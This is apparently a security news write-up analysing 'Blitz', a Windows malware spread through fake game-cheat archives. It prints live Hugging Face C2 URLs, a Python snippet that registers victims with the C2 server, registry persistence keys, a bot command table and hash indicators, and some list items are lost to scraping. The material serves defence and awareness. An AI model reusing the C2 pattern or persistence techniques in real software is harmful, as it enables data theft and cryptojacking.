Security researchers have identified an advanced Windows-based malware dubbed Blitz, which is being used to compromise servers and desktops for cryptocurrency mining and data exfiltration.
Blitz’s Two-Stage Architecture
Blitz is a modular malware that operates in two distinct phases:
Infection Vector and Persistence Strategies
Blitz leverages social engineering and the lure of free game cheats to trick users into executing its initial payload. For example, archives like Elysium_CrackBy@sw1zzx_dev.zip or Nerest_CrackBy@sw1zzx_dev.zip contain backdoored executables. Once run, these files:
ieapfltr.dll) using registry run keys, such as:textHKCU\Software\Microsoft\Windows\CurrentVersion\Run or by adding a script to:textHKCU\Environment\UserInitMprLogonScriptexplorer.exe) to initiate malicious activity.Command and Control (C2) via Hugging Face
Blitz stands out for its abuse of Hugging Face Spaces—a platform intended for sharing AI models and applications—to host its C2 infrastructure and payloads. The malware’s operators have utilized FastAPI to create a REST API that manages infected hosts, distributes commands, and serves malware payloads:
Example C2 API Endpoints:
texthttps://e445a00fffe335d6dac0ac0fe0a5accc-9591beae439b860-b5c7747.hf.space/6E6D73 // Bot payload
https://e445a00fffe335d6dac0ac0fe0a5accc-9591beae439b860-b5c7747.hf.space/6E6D72 // XMRig miner
https://e445a00fffe335d6dac0ac0fe0a5accc-9591beae439b860-b5c7747.hf.space/6174727A // Victim registration
Victim Registration Example in Python (simplified):
pythonimport requests
data = {
"auth": "hardware_guid",
"name": "user_name",
"cwd": "base64_encoded_working_dir"
}
response = requests.post("https://[C2]/6174727A", json=data)
This mechanism allows the malware operator to manage thousands of compromised systems globally.
Bot Functionality
Blitz bot payloads implement a range of malicious functions, including:
Monero Mining Payload
A significant threat posed by Blitz is the deployment of the XMRig cryptocurrency miner, which hijacks system resources to mine Monero for the attacker. The miner is injected into the explorer.exe process to evade detection:
Miner Mutex Check (to avoid multiple instances):
text9bdcf5f16cb8331241b2997ef88d2a67
Sample Command Table from Blitz Bot
| Command | Description |
|---|---|
| keydump | Upload and delete keylogger logs |
| screenshot | Capture screenshot and upload |
| cd | Change working directory |
| strss | DDoS a specified URL |
| [unknown] | Execute cmd.exe command and upload output |
Sample SHA256 Hashes of Blitz Payloads (Indicators of Compromise):
14467edd617486a1a42c6dab287ec4ae21409a5dc8eb46d77b853427b67d16d6
1bd55796ec712a98cf30fac404b29fcb2cdaa355cb596edcc12d8fbd918b4138
2007069b32bb9a7f87298fe3c1a87443c21f187ab8465c5b4a1505f0e5c7b898
3099f41fb60e6f7fe5c1ae2141d4ac5d6f78c763f8cf3e68b2f154cf1a93faa7
3c77173659b8049b96ca08fc1b8c6122e8d0cfb365920028dc3d18e95cf32ab2
49b50765749c5e95c2010d790a691689b01e3f844636cd0d47e9fcfe346d7f40
541a94110a0f9f73722bb9dd7d05b8d1822ad496084d39a777cb39f3b092b6e1
Persistence and Mitigation
Blitz employs sophisticated persistence mechanisms, including multiple registry entries and logon scripts. Users should monitor and regularly review:
textHKCU\Environment\UserInitMprLogonScript
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
for suspicious entries.
Mitigation Recommendations:
Blitz malware represents a significant and technically advanced threat to Windows environments, leveraging social engineering, sophisticated C2 infrastructure, and legitimate online platforms for payload delivery.
Its focus on Monero mining and data exfiltration makes it especially dangerous for both individuals and organizations.
Awareness, vigilance, and robust security controls are essential to counter this evolving cyber threat.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…